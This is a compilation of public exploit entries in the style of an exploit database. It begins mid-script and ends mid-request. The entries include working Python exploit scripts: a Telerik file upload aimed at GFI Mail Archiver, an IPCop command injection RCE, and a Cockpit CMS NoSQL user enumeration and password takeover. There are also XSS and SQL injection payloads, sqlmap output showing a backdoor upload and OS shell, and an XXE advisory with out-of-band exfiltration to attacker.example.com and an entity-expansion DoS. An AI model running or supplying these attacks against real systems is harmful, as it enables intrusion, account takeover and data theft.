salt) result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack elif type == 2: result = PBKDF.derive2(password, salt) return result[0:32], result[32:] class RAUCipher: # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 2 of 2 # Default settings are for vulnerable versions before 2017 patches with default keys T_Upload_ConfigurationHashKey = \ "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey T_AsyncUpload_ConfigurationEncryptionKey = \ "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password # Latest tested version working with this setting: 2018.1.117 # Probably working up to and including 2018.3.910 PBKDF_ALGORITHM = 1 # Earliest tested version working with this setting: 2019.2.514 # Probably introduced 2019.1.115 # PBKDF_ALGORITHM = 2 # ****************************************** # ****************************************** key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) # print(binascii.hexlify(key).decode().upper()) # print(binascii.hexlify(iv).decode().upper()) def encrypt(plaintext): sys.stderr.write("Encrypting... ") encoded = "" for i in plaintext: encoded = encoded + i + "\x00" plaintext = encoded + ( chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16)) ) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) sys.stderr.write("done\n") return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() def decrypt(ciphertext): sys.stderr.write("Decrypting... ") ciphertext = base64.b64decode(ciphertext) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) unpad = lambda s: s[0:-ord(chr(s[-1]))] sys.stderr.write("done\n") return unpad(cipher.decrypt(ciphertext)).decode()[0::2] def addHmac(string, Version): isHmacVersion = False # "Encrypt-then-MAC" feature introduced in R1 2017 # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) if int(Version[:4]) >= 2017: isHmacVersion = True hmac = HMAC.new( bytes(RAUCipher.HASHKEY.encode()), string.encode(), SHA256.new() ) hmac = base64.b64encode(hmac.digest()).decode() return string + hmac if isHmacVersion else string def getProxy(proxy): return { "http" : proxy, "https" : proxy } def rauPostData_enc(partA, partB): data = "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" data += "\r\n" data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" return data def rauPostData_prep(TempTargetFolder, Version): TargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(""), Version ) TempTargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(TempTargetFolder), Version ) partA = \ '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ TempTargetFolder + \ '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' partB = \ "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" return rauPostData_enc(partA, partB) def payload(TempTargetFolder, Version, payload_filename): sys.stderr.write("Local file path: " + payload_filename + "\n") payload_filebasename = os.path.basename(payload_filename) sys.stderr.write("Destination file name: " + payload_filebasename + "\n") sys.stderr.write("Destination path: " + TempTargetFolder + "\n") sys.stderr.write("Version: " + Version + "\n") sys.stderr.write("Preparing payload... \n") payload_file = open(payload_filename, "rb") payload_file_data = payload_file.read() payload_file.close() data = rauPostData_prep(TempTargetFolder, Version) data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" data += "Content-Type: application/octet-stream\r\n" data += "\r\n" data += payload_file_data.decode("raw_unicode_escape") + "\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"fileName\"\r\n" data += "\r\n" data += "RAU_crypto.bypass\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"contentType\"\r\n" data += "\r\n" data += "text/html\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" data += "\r\n" data += "2019-01-02T03:04:05.067Z\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"metadata\"\r\n" data += "\r\n" data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ payload_filebasename + "\"}\r\n" data += "-----------------------------62616f37756f2f--\r\n" data += "\r\n" sys.stderr.write("Payload prep done\n") return data def upload(data, url, proxy = False): global CERT_VERIFY sys.stderr.write("Preparing to send request to " + url + "\n") session = requests.Session() request = requests.Request( "POST", url, data=data ) request = request.prepare() request.headers["Content-Type"] = \ "multipart/form-data; " +\ "boundary=---------------------------62616f37756f2f" response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) sys.stderr.write("Request done\n") return response.text def decode_rauPostData(rauPostData): rauPostData = rauPostData.split("&") rauJSON = RAUCipher.decrypt(rauPostData[0]) decoded = "\nJSON: " + rauJSON + "\n" TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] decoded = decoded + "\nTempTargetFolder = " + \ RAUCipher.decrypt(TempTargetFolder) + "\n" rauVersion = RAUCipher.decrypt(rauPostData[1]) decoded = decoded + "\nVersion: " + rauVersion + "\n" return decoded def mode_decrypt(): # decrypt ciphertext ciphertext = sys.argv[2] print("\n" + RAUCipher.decrypt(ciphertext) + "\n") def mode_Decrypt_rauPostData(): # decrypt rauPostData rauPostData = sys.argv[2] print(decode_rauPostData(rauPostData)) def mode_encrypt(): # encrypt plaintext plaintext = sys.argv[2] print("\n" + RAUCipher.encrypt(plaintext) + "\n") def mode_Encrypt_rauPostData(): # encrypt rauPostData based on TempTargetFolder and Version TempTargetFolder = sys.argv[2] Version = sys.argv[3] print( "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n" ) def mode_payload(): # generate a payload based on TempTargetFolder, Version and payload file TempTargetFolder = sys.argv[2] Version = "2013.1.417.40" payload_filename = sys.argv[4] print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") print(payload(TempTargetFolder, Version, payload_filename)) def mode_Post(proxy = False): # generate and upload a payload based on # TempTargetFolder, Version, payload file and url Version = "2013.1.417.40" url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" payload_filename = sys.argv[4] TempTargetFolder = sys.argv[6] print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) print("\n[+] Check your uploaded file\n"); def mode_help(): print( "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") if len(sys.argv) < 2: mode_help() elif sys.argv[1] == "-u" and len(sys.argv) == 7: mode_Post() else: mode_help()

# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation # Date: 2021-08-06 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://gestionaleamica.com - https://www.bisanziosoftware.com # Software Link: https://gestionaleamica.com/Download/AmicaProdigySetup.exe # Version: 1.7 # Tested on: Windows 10 Pro 20H2 x64 # CVE: CVE-2021-35312 Amica Prodigy it's a backup solution from Amica softwares (GestionaleAmica: invoices, accounting, etc., from website gestionaleamica.com), a CIR 2000 srl / Bisanzio Software srl A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable "RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it with a malicious file that will be executed with "LocalSystem" privileges at scheduled time. C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe C:\AmicaProdigy\RemoteBackup.Service.exe NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Elaborazione completata per 1 file.

# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 02/08/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipcop.org/ # Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg # Version: 2.1.9 # Tested on: parrot os 5.7.0-2parrot2-amd64 #!/usr/bin/python3 import requests as R import os import sys import base64 import urllib3 R.packages.urllib3.disable_warnings() R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: # no pyopenssl support used / needed / available pass try: hostport = sys.argv[1] assert hostport[:8] == "https://" and hostport[-1] == "/" url = hostport + "cgi-bin/email.cgi" username = sys.argv[2].encode() password = sys.argv[3].encode() auth = base64.b64encode(username+b":"+password).decode() command = sys.argv[4] assert " " in command except: print("[-] Usage https://host:port/ username password command(no spaces) <port for listen with nc - optional - >") exit(1) rheader = {"Authorization":"Basic "+auth, "Origin": hostport, "Referer": url} rdata = { "EMAIL_SERVER": "mucahitsaratar.github.io", "EMAIL_USE_TLS": "auto", "EMAIL_SERVER_PORT": "1337", "EMAIL_USR": "ipcop@localdomain", "EMAIL_PW": f"`{command}`", "EMAIL_FROM": "ipcop@localdomainn", "EMAIL_TO": "ipcop@localdomainnn", "ACTION": "Kaydet" # change here to what is mean the "save && send test mail" in target language } R.post(url,headers=rheader, data=rdata, verify=False) rdata["ACTION"] = "Test postası gönder" # send test mail R.post(url,headers=rheader, data=rdata, verify=False)

# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure # Date: 27-Dec-2018 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.mi.com/us # Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/ # Version: 10.2.4.g # Tested on: Tested in Android Version: 8.1.0 # CVE : CVE-2018-20523 *summary: * Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history. *Vulnerable component:* com.android.browser.searchhistory *Poc:* adb forward tcp:31415 tcp:31415 drozer console connect drozer > run app.provider.query content://com.android.browser.searchhistory/searchhistory *Blogpost:* https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/

# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection # Date: 06-08-2021 # Exploit Author: Brian Ombongi # Vendor Homepage: https://getcockpit.com/ # Version: Cockpit 0.11.1 # Tested on: Ubuntu 16.04.7 # CVE : CVE-2020-35847 & CVE-2020-35848 #!/usr/bin/python3 import json import re import requests import random import string import argparse def usage(): guide = 'python3 exploit.py -u <target_url> ' return guide def arguments(): parse = argparse.ArgumentParser(usage=usage()) parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True) return parse.parse_args() def test_connection(url): try: get = requests.get(url) if get.status_code == 200: print(f"[+] {url}: is reachable") else: print(f"{url}: is Not reachable, status_code: {get.status_code}") except requests.exceptions.RequestException as e: raise SystemExit(f"{url}: is Not reachable \nErr: {e}") def enumerate_users(url): print("[-] Attempting Username Enumeration (CVE-2020-35846) : \n") url = url + "/auth/requestreset" headers = { "Content-Type": "application/json" } data= {"user":{"$func":"var_dump"}} req = requests.post(url, data=json.dumps(data), headers=headers) pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I) matches = pattern.findall(req.content.decode('utf-8')) if matches: print ("[+] Users Found : " + str(matches)) return matches else: print("No users found") def check_user(usernames): user = input("\n[-] Get user details For : ") if user not in usernames: print("User does not exist...Exiting") exit() else: return user def reset_tokens(url): print("[+] Finding Password reset tokens") url = url + "/auth/resetpassword" headers = { "Content-Type": "application/json" } data= {"token":{"$func":"var_dump"}} req = requests.post(url, data=json.dumps(data), headers=headers) pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I) matches = pattern.findall(req.content.decode('utf-8')) if matches: print ("\t Tokens Found : " + str(matches)) return matches else: print("No tokens found, ") def user_details(url, token): print("[+] Obtaining user information ") url = url + "/auth/newpassword" headers = { "Content-Type": "application/json" } userAndtoken = {} for t in token: data= {"token":t} req = requests.post(url, data=json.dumps(data), headers=headers) pattern=re.compile(r'(this.user\s*=)([^;]+)', re.I) matches = pattern.finditer(req.content.decode('utf-8')) for match in matches: matches = json.loads(match.group(2)) if matches: print ("-----------------Details--------------------") for key, value in matches.items(): print("\t", "[*]", key ,":", value) else: print("No user information found.") user = matches['user'] token = matches['_reset_token'] userAndtoken[user] = token print("--------------------------------------------") continue return userAndtoken def password_reset(url, token, user): print("[-] Attempting to reset %s's password:" %user) characters = string.ascii_letters + string.digits + string.punctuation password = ''.join(random.choice(characters) for i in range(10)) url = url + "/auth/resetpassword" headers = { "Content-Type": "application/json" } data= {"token":token, "password":password} req = requests.post(url, data=json.dumps(data), headers=headers) if "success" in req.content.decode('utf-8'): print("[+] Password Updated Succesfully!") print("[+] The New credentials for %s is: \n \t Username : %s \n \t Password : %s" % (user, user, password)) def generate_token(url, user): url = url + "/auth/requestreset" headers = { "Content-Type": "application/json" } data= {"user":user} req = requests.post(url, data=json.dumps(data), headers=headers) def confirm_prompt(question: str) -> bool: reply = None while reply not in ("", "y", "n"): reply = input(f"{question} (Y/n): ").lower() if reply == "y": return True elif reply == "n": return False else: return True def pw_reset_trigger(details, user, url): for key in details: if key == user: password_reset(url, details[key], key) else: continue if __name__ == '__main__': args = arguments() url = args.url test_connection(url) user = check_user(enumerate_users(url)) generate_token(url, user) tokens = reset_tokens(url) details = user_details(url, tokens) print("\n") b = confirm_prompt("[+] Do you want to reset the passowrd for %s?" %user) if b: pw_reset_trigger(details, user, url) else: print("Exiting..") exit()

# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS) # Date: 2021-08-06 # Exploit Author: Aryan Chehreghani # Software Link: https://wordpress.org/plugins/picture-gallery/ # Version: 1.4.2 # Tested on: Windows 10 How to Reproduce this Vulnerability: 1. Install WordPress 5.8 2. Install and activate Picture Gallery - Frontend Image Uploads, AJAX Photo List 3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: Simple Library Management System 1.0 - 'rollno' SQL Injection # Date: 2021-08-08 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.nikhilbhalerao.com/ # Software Link: https://www.sourcecodester.com/php/14126/simple-library-management-system.html # Version: V1 # Category: Webapps # Tested on: Linux/Windows # Description: # PHP Dashboards is prone to an SQL-injection vulnerability # because it fails to sufficiently sanitize user-supplied data before using # it in an SQL query.Exploiting this issue could allow an attacker to # compromise the application, access or modify data, or exploit latent # vulnerabilities in the underlying database. # Vulnerable Request: POST /registration_authenticate.php HTTP/1.1 Host: localhost Content-Length: 320 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/registration.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close rollno=000001&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456 # Vulnerable Payload: # Parameter: rollno (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: rollno=ybGo' AND (SELECT 2194 FROM (SELECT(SLEEP(10)))IICl) AND 'vivZ'='vivZ&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456

# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE) # Date: 2021-08-10 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://www.altova.com/mobiletogether-server # Version: 7.3 # CVE: 2021-37425 Advisory: XML External Entity Expansion in MobileTogether Server RedTeam Pentesting discovered a vulnerability in the MobileTogether server which allows users with access to at least one app to read arbitrary, non-binary files from the file system and perform server-side requests. The vulnerability can also be used to deny availability of the system. As an example, this advisory shows the compromise of the server's certificate and private key. Details ======= Product: MobileTogether Server Affected Versions: 7.0-7.3, potentially earlier versions as well Fixed Versions: 7.3 SP1 Vulnerability Type: XML External and Exponential Entity Expansion Security Risk: medium Vendor URL: https://www.altova.com/mobiletogether-server Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002 Advisory Status: published CVE: CVE-2021-37425 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425 Introduction ============ "MobileTogether Server is the processing powerhouse for your native iOS, Android, Windows, and browser-based apps. MobileTogether Server is the back-end hub for your solutions and acts as a gateway between end-users and your back-end data sources and infrastructure." (from the vendor's homepage) More Details ============ MobileTogether Server is a back-end application hosting developed apps and provide access to various platforms and devices. Access to these apps is possible via native applications for devices and operating systems or directly via the browser. To access the MobileTogether server, depending on configuration either an anonymous login is possible or credentials are required. During analysis of the communication between a MobileTogether client application on a smartphone and the MobileTogether Server, HTTP requests were observed containing JSON as well as XML data. Generally, the XML data is used to signal changes in the UI or user-supplied input for the app hosted in MobileTogether Server. It was found that user-supplied XML external entities included in the described HTTP requests are resolved by the MobileTogether Server and the result is reflected in an HTTP response. This behaviour allows to read local files, perform server-side requests and also deny the availability of the service through XML exponential entity expansion. However, file disclosure is limited to non-binary files and the absolute path needs to be known in advance. Proof of Concept ================ MobileTogether Server comes with a series of example applications. To exploit the vulnerability, access to at least one application is required. In the following, the app EuroFXrates and the default user root with the default password root is used for demonstration of the vulnerability. The following HTTP request contains the minimal data required to be accepted by the server resulting in the processing of the XML data stored within the JSON field InfoSetChanges/Changes (formatted for better readability): ------------------------------------------------------------------------ POST /workflowmanagement HTTP/1.1 Authorization: Basic cm9vdDpyb290 Content-Type: application/json Content-Length: 851 Host: 192.168.1.1:8085 Connection: close { "DeviceY": 0, "ClientVersionName": "7.2.2", "MobileManufacturer": "", "AllInfosetsSerialized": true, "ServerName": "192.168.1.1", "ProtocolVersionMax": "2", "Language": "en-US", "DeviceType": "", "ClientKey": "1_11148009037086584903_2744738433663963458", "DeviceXDPI": 0, "DeviceYDPI": 0, "DeviceYCanvasWithTabs": 0, "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}", "ProtocolVersionMin": "2", "DeviceXCanvas": 0, "ClientArchiveVersionMin": "-74", "MobileOSVersion": "Android 11", "DeviceXCanvasWithTabs": 0, "ClientArchiveVersionMax": "65", "User": "root", "DeviceX": 0, "DesignFileName": "/public/EuroFXrates", "EncValue": "M9EBc6-7P5cd0", "DeviceYCanvas": 0, "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412", "InfosetChanges": [ { "Changes": [ { "": "<?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <SkipIntro>false</SkipIntro> </Root>" } ], "ID": "$$PERS$$" } ], "DeviceIsPortrait": true } ------------------------------------------------------------------------ With the following XML data it can be verified that XML entities are resolved and reflected within predefined XML tags in the HTTP response: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE Root [ <!ENTITY redteam "RedTeam Pentesting"> ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The HTTP response contains the resolved XML entity: ------------------------------------------------------------------------ HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] <?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <RedTeam>RedTeam Pentesting</RedTeam> [...] ------------------------------------------------------------------------ The following example shows how local files can be read from the server system hosting the MobileTogether Server on a Windows system: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE Root [ <!ENTITY redteam SYSTEM "file://c:/windows/win.ini"> ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The content of the file is shown below and formatted for better readability: ------------------------------------------------------------------------ HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] <?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <RedTeam> ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 </RedTeam> [...] ------------------------------------------------------------------------ One interesting target for attackers could be the configuration file for the MobileTogether Server residing at the following fixed location: ------------------------------------------------------------------------ C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg ------------------------------------------------------------------------ For example, if the server supports HTTPS, the absolute path to the server's certificate and private key is stored in its configuration. Furthermore, external XML entities can be used to access third-party websites as well as web services that are only available internally. Together with an externally hosted XML DTD, response information can be extracted: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % content SYSTEM "http://internal.example.com"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The DTD contains the following information: ------------------------------------------------------------------------ <!ENTITY redteam "%start;%content;%end;"> ------------------------------------------------------------------------ In the HTTP response, the HTML markup delivered by internal.example.com is now visible. A further vulnerability attacks the availability of the service through XML exponential entity expansion. This is demonstrated with the following XML document: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY redteam0 "RedTeam Pentesting"> <!ENTITY redteam1 "&redteam0; &redteam0;"> <!ENTITY redteam2 "&redteam1; &redteam1;"> <!ENTITY redteam3 "&redteam2; &redteam2;"> <!ENTITY redteam4 "&redteam3; &redteam3;"> <!ENTITY redteam5 "&redteam4; &redteam4;"> <!ENTITY redteam6 "&redteam5; &redteam5;"> <!ENTITY redteam7 "&redteam6; &redteam6;"> <!ENTITY redteam8 "&redteam7; &redteam7;"> <!ENTITY redteam9 "&redteam8; &redteam8;"> <!ENTITY redteam10 "&redteam9; &redteam9;"> <!ENTITY redteam11 "&redteam10; &redteam10;"> <!ENTITY redteam12 "&redteam11; &redteam11;"> <!ENTITY redteam13 "&redteam12; &redteam12;"> <!ENTITY redteam14 "&redteam13; &redteam13;"> <!ENTITY redteam15 "&redteam14; &redteam14;"> <!ENTITY redteam16 "&redteam15; &redteam15;"> <!ENTITY redteam17 "&redteam16; &redteam16;"> <!ENTITY redteam18 "&redteam17; &redteam17;"> <!ENTITY redteam19 "&redteam18; &redteam18;"> <!ENTITY redteam20 "&redteam19; &redteam19;"> ]> <Root> <RedTeam>&redteam20;</RedTeam> </Root> ------------------------------------------------------------------------ Sending the shown XML document leads to a huge server-side resource allocation which ultimately disrupts the availability of the MobileTogether Server. Workaround ========== None known. Fix === According to the vendor, upgrading to version 7.3 SP1 resolves the vulnerability. Security Risk ============= Attackers in possession of an account for a MobileTogether Server with access to at least one app are able to read files from the server system, conduct HTTP requests to external and internal systems and can also deny the availability of the service. Access might also be possible through default credentials or the anonymous user. Timeline ======== 2021-06-21 Vulnerability identified 2021-06-23 Requested a security contact from vendor 2021-06-25 Security contact established with vendor 2021-07-05 Customer approved disclosure to vendor 2021-07-05 Vendor notified 2021-07-20 Vendor acknowledged vulnerability 2021-07-22 CVE ID requested 2021-07-23 CVE ID assigned 2021-07-28 Vendor released fixed version 2021-08-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection # Google Dork: intitle: "COVID19 Testing Management System" # Date: 09/08/2021 # Exploit Author: Ashish Upsham # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows Description: The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to SQL injection via the 'searchdata' parameter on the patient-search-report.php page. ==================== 1. SQLi ==================== http://192.168.0.107:80/covid-tms/patient-search-report.php The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'searchdata' is vulnerable. step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell" ---------------------------------------------------------------------- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B) [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-ashish\ashish' os-shell>

# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections # Date: 11-08-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Software Link: https://www.sourcecodester.com/php/14904/rates-system.html # Version: V1.0 # Category: Webapps # Tested on: Linux/Windows # Description: # PHP Dashboards is prone to an SQL-injection vulnerability # because it fails to sufficiently sanitize user-supplied data before using # it in an SQL query.Exploiting this issue could allow an attacker to # compromise the application, access or modify data, or exploit latent # vulnerabilities in the underlying database. # Vulnerable Request: POST /register.php HTTP/1.1 Host: localhost Content-Length: 70 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/register.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf Connection: close ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register= # Vulnerable Payload: # Parameter: ClientId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR -------------------------------------------------------------------------------------------------------------------------- # Vulnerable Request: POST /passwordreset.php HTTP/1.1 Host: localhost 